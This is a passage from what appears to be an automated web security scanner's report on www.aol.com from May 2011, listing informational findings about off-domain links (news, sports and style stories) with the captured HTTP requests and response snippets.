<li ><a name="om_dl6_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl6|sec3_lnk3|60588" href="http://www.autoblog.com/iphone-app">The Item Every Car Owner Needs</a>
...[SNIP]...

16.3. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following link to another domain:

http://o.aolcdn.com/hss/storage/adam/9a0f1105cdf5d18ca9dbade82ffeef62/computer-checkup-386ak031011.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575091494-Repeat%7C1367647091494%3B%20s_nrgvo%3DRepeat%7C1367647091495%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl8

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-31.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3779
Set-Cookie: JSESSIONID=B5EBF0B2504FE748DC0CE3C5FCEE4230; Path=/aol
Content-Length: 3779

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-60308 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</b><img height="217" alt="AOL Computer Checkup" width="386" src="http://o.aolcdn.com/hss/storage/adam/9a0f1105cdf5d18ca9dbade82ffeef62/computer-checkup-386ak031011.jpg"/></a>
...[SNIP]...

16.4. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/273893/thumbs/a-BOY12-386x217.jpg
http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World
http://www.huffingtonpost.com/2011/05/04/mississippi-river-floods-2011_n_857342.html
http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html
http://www.huffingtonpost.com/2011/05/04/south-korea-crucifixion-b_n_857375.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-44.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2527
Set-Cookie: JSESSIONID=57140D656FAAD0E2F2B1BC4890EBE161; Path=/aol
Content-Length: 2527

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl13 plid-60505 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl13_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl13|sec1_lnk1|60505" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html"><img height="217" alt="12-year-old Pakistani boy" width="386" src="http://i.huffpost.com/gen/273893/thumbs/a-BOY12-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl13_hdln" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl13|sec1_lnk2|60505">Bin Laden's 12-Year-Old Neighbor

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl13_cpy" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-boy-rabbits_n_857186.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl13|sec1_lnk3|60505">Gifts bin Ladens gave the boy

</a>
...[SNIP]...
<li ><a name="om_dl13_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl13|sec3_lnk1|60505" href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World">Poll: Most People Think Osama's In Hell

</a>
...[SNIP]...
<li ><a name="om_dl13_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl13|sec3_lnk2|60505" href="http://www.huffingtonpost.com/2011/05/04/mississippi-river-floods-2011_n_857342.html">Floods Threaten Nation's Midsection

</a>
...[SNIP]...
<li ><a name="om_dl13_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl13|sec3_lnk3|60505" href="http://www.huffingtonpost.com/2011/05/04/south-korea-crucifixion-b_n_857375.html">South Korean Man Found Crucified

</a>
...[SNIP]...

16.5. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/273888/thumbs/a-KIA-386x217.jpg
http://www.autoblog.com/iphone-app

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~4~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575047990-Repeat%7C1367647047990%3B%20s_nrgvo%3DRepeat%7C1367647047997%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-29.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2272
Set-Cookie: JSESSIONID=CD1AFB42904A5FE4368A72E2160DC110; Path=/aol
Content-Length: 2272

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-60506 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl6|sec1_lnk1|60506" href="http://autos.aol.com/article/stop-start-technology/"><img height="217" alt="Kia" width="386" src="http://i.huffpost.com/gen/273888/thumbs/a-KIA-386x217.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl6_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl6|sec3_lnk2|60506" href="http://www.autoblog.com/iphone-app">Accessory All Car Owners Need</a>
...[SNIP]...

16.6. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=local&t=cod

The response contains the following links to other domains:

http://portal.aolcdn.com/p5/_v42.5/css/maing.png
http://www.aolnews.com/

Request

Response

16.7. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/273763/thumbs/a-STYLE-FINDER-KOHLS-386x217.jpg
http://portal.aolcdn.com/p5/forms/673/f412e8db-e646-461e-9f77-1b269a2776da.png
http://www.stylelist.com/style-finder/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl8

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-28.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1843
Set-Cookie: JSESSIONID=2C3E4775C9628A9C2BDA45DBBE1EB386; Path=/aol
Content-Length: 1843

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-44117 display-lightbox">
<div id="advert">

...[SNIP]...
</span>
<a id="dlimg" name="om_dl9_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl9|sec1_lnk1|44117" href="http://www.stylelist.com/style-finder/"><span class="overlay"></span><img height="217" alt="Women Shopping" width="386" src="http://i.huffpost.com/gen/273763/thumbs/a-STYLE-FINDER-KOHLS-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl9_hdln" onclick=" " href="http://www.stylelist.com/style-finder/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl9|sec1_lnk2|44117">Tricks to Make Your Legs Look Longer</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl9_cpy" href="http://www.stylelist.com/style-finder/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl9|sec1_lnk3|44117">Style tips that work for almost anyone</a>
...[SNIP]...
<a id="dl-sponsorimg" class="icid-maing-grid7|main5|dl9|link4|44117"><img src="http://portal.aolcdn.com/p5/forms/673/f412e8db-e646-461e-9f77-1b269a2776da.png"/></a>
...[SNIP]...

16.8. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/274077/thumbs/a-GROUND-ZERO-MEMORIAL-386x217.jpg
http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html
http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-raid-reaching-for-weapon_n_857836.html
http://www.huffingtonpost.com/2011/05/05/japan-nuclear-crisis-workers-enter-reactor-building_n_857880.html
http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-26.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2465
Set-Cookie: JSESSIONID=027CF01FEEC7A7B1B7CC1A8BD50A5DFD; Path=/aol
Content-Length: 2465

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl1 plid-60584 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1|60584" href="http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html"><img height="217" alt="Ground Zero memorial" width="386" src="http://i.huffpost.com/gen/274077/thumbs/a-GROUND-ZERO-MEMORIAL-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2|60584">New York Gets Its Moment of Justice</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/05/05/obama-giving-ny-its-momen_n_857890.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3|60584">What Obama said to doubters</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl1|sec3_lnk1|60584" href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-raid-reaching-for-weapon_n_857836.html">SEALS Feared Osama Might Attack</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl1|sec3_lnk2|60584" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html">Bin Laden Death Scene Photos Published</a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3|60584" href="http://www.huffingtonpost.com/2011/05/05/japan-nuclear-crisis-workers-enter-reactor-building_n_857880.html">Nuclear Workers Bravely Enter Reactor</a>
...[SNIP]...

16.9. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them
http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets
http://aol.sportingnews.com/nhl/feed/2011-05/washingtontampa-bay/story/bergenheim-helps-lightning-complete-sweep-of-washington-capitals
http://aol.sportingnews.com/sport/story/2011-05-04/kentucky-derby-field
http://o.aolcdn.com/hss/storage/adam/6b259a1fdeac0bf0b61d0050d30d10b7/dirk-nowitzki-386vm050511.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-39.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2822
Set-Cookie: JSESSIONID=20A837E26D852DB6741A2CD7BE9C2FF1; Path=/aol
Content-Length: 2822

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-60594 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|60594" href="http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them"><img height="217" alt="Dirk Nowitzki posts up Lamar Odom in the second half in Game Two of the Western Conference Semifinals" width="386" src="http://o.aolcdn.com/hss/storage/adam/6b259a1fdeac0bf0b61d0050d30d10b7/dirk-nowitzki-386vm050511.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" onclick=" " href="http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|60594">Mavericks Expose an L.A. Problem</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://aol.sportingnews.com/nba/story/2011-05-05/lakers-have-problems-and-are-running-out-of-time-to-fix-them" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|60594">Why the champs are <i>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl7|sec3_lnk1|60594" href="http://aol.sportingnews.com/sport/story/2011-05-04/kentucky-derby-field">2011 Kentucky Derby Field Unveiled</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|60594" href="http://aol.sportingnews.com/nhl/feed/2011-05/washingtontampa-bay/story/bergenheim-helps-lightning-complete-sweep-of-washington-capitals">NHL No. 1 Seed Swept Out of Playoffs</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|60594" href="http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets">Steelers Star Explains 9/11 Comments</a>
...[SNIP]...

16.10. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/d04cf6bff6a42e183cb3394e023e4a0/anyas-moms-wedding-dress-386kk0405.jpg
http://www.huffingtonpost.com/2011/05/04/jennifer-lopez-harem-pants_n_857334.html
http://www.huffingtonpost.com/2011/05/04/oldest-newlyweds-rose-pollard-forrest-lunsway_n_857312.html
http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2435
Set-Cookie: JSESSIONID=A40CCB6A99F401AA8EDE16636ADD46B1; Path=/aol
Content-Length: 2435

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-60529 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|60529" href="http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/"><img height="217" alt="Anya Strzemien" width="386" src="http://o.aolcdn.com/hss/storage/adam/d04cf6bff6a42e183cb3394e023e4a0/anyas-moms-wedding-dress-386kk0405.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|60529">Why I Wear My Mom's Wedding Dress
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.stylelist.com/2011/05/04/my-mothers-70s-wedding-dress/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|60529">Pics of the dress now and in 1973
</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|60529" href="http://www.huffingtonpost.com/2011/05/04/oldest-newlyweds-rose-pollard-forrest-lunsway_n_857312.html">Meet Oldest Couple to Be Married
</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|60529" href="http://www.huffingtonpost.com/2011/05/04/jennifer-lopez-harem-pants_n_857334.html">J.Lo Brings Back Old Pants Style
</a>
...[SNIP]...

16.11. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://i.huffpost.com/gen/273394/thumbs/a-OSAMA-386x217.jpg
http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html
http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html
http://www.huffingtonpost.com/2011/05/04/dems-plan-oil-subsidy-vote_n_857685.html
http://www.huffingtonpost.com/2011/05/04/joe-biden-debt-ceiling_n_857738.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=1&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
